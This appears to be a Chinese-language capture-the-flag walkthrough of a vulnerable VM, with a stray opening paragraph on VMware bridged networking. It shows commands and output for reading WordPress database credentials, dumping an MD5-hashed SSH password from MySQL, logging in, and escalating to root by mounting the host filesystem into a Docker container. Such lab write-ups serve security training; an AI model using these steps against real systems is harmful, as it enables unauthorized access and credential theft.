在这种模式下,使用 VMnet0 虚拟交换机,虚拟机就像是局域网中的一台独立的主机,与宿主机一样,它可以访问网络内任何一台机器。在桥接模式下,可以手工配置它的 TCP/IP 配置信息(IP、子网掩码等,而且还要和宿主机处于同一网段),以实现通过局域网的网关或路由器访问互联网,还可以将 IP 和 DNS 设置成”自动获取“。
cat wp-config.php /** MySQL database username */ define('DB_USER', 'wordpress'); /** MySQL database password */ define('DB_PASSWORD', 'wordpress'); /* MySQL hostname */ define('DB_HOST', 'db:3306');
# 直接进入失败了 mysql -u wordpress -p wordpress ERROR 2002 (HY000): Can't connect to local MySQL server through socket '/var/run/mysqld/mysqld.sock' (2 "No such file or directory")
# 先拿到 ip ping db -c 3 64 bytes from experimental_db_1.experimental_default (172.18.0.2): icmp_seq=65 ttl=64 time=0.044 ms # 还有一招 arp -an
# 远程连接试试 mysql -h 172.18.0.2 -u wordpress -p wordpress MySQL [(none)]> show databases; show databases; +--------------------+ | Database | +--------------------+ | information_schema | | wordpress | +--------------------+ 2 rows in set (0.00 sec)
MySQL [(none)]> use wordpress; use wordpress; Reading table information for completion of table and column names You can turn off this feature to get a quicker startup with -A
MySQL [wordpress]> select * from host_ssh_cred; select * from host_ssh_cred; +-------------------+----------------------------------+ | id | pw | +-------------------+----------------------------------+ | hummingbirdscyber | e10adc3949ba59abbe56e057f20f883e | +-------------------+----------------------------------+ 1 row in set (0.00 sec)
拿到权限
解密可得 123456,此时再试试 ssh 连接。
hummingbirdscyber@vulnvm:~$ id uid=1000(hummingbirdscyber) gid=1000(hummingbirdscyber) groups=1000(hummingbirdscyber),4(adm),24(cdrom),30(dip),46(plugdev),113(lpadmin),128(sambashare),129(docker)
发现 docker 的身影
docker ps hummingbirdscyber@vulnvm:~$ docker ps CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES 252fa8cb1646 ubuntu "/bin/bash" 6 weeks ago Up 5 minutes brave_edison 1afdd1f6b82c wordpress:latest "docker-entrypoint.s…" 6 weeks ago Up 5 minutes 0.0.0.0:8000->80/tcp experimental_wordpress_1 81a93420fd22 mysql:5.7 "docker-entrypoint.s…" 6 weeks ago Up 5 minutes 3306/tcp, 33060/tcp experimental_db_1
进了几个容器看了下,找不到 flag,卡住了。
We find that the Ubuntu image is available to us, so we use this to create a new docker container and mount the / directory of the host inside a folder called /root. After we run the docker image we go to /root/root and find a file called “flag”. When we open the file, we find our congratulatory flag.
评论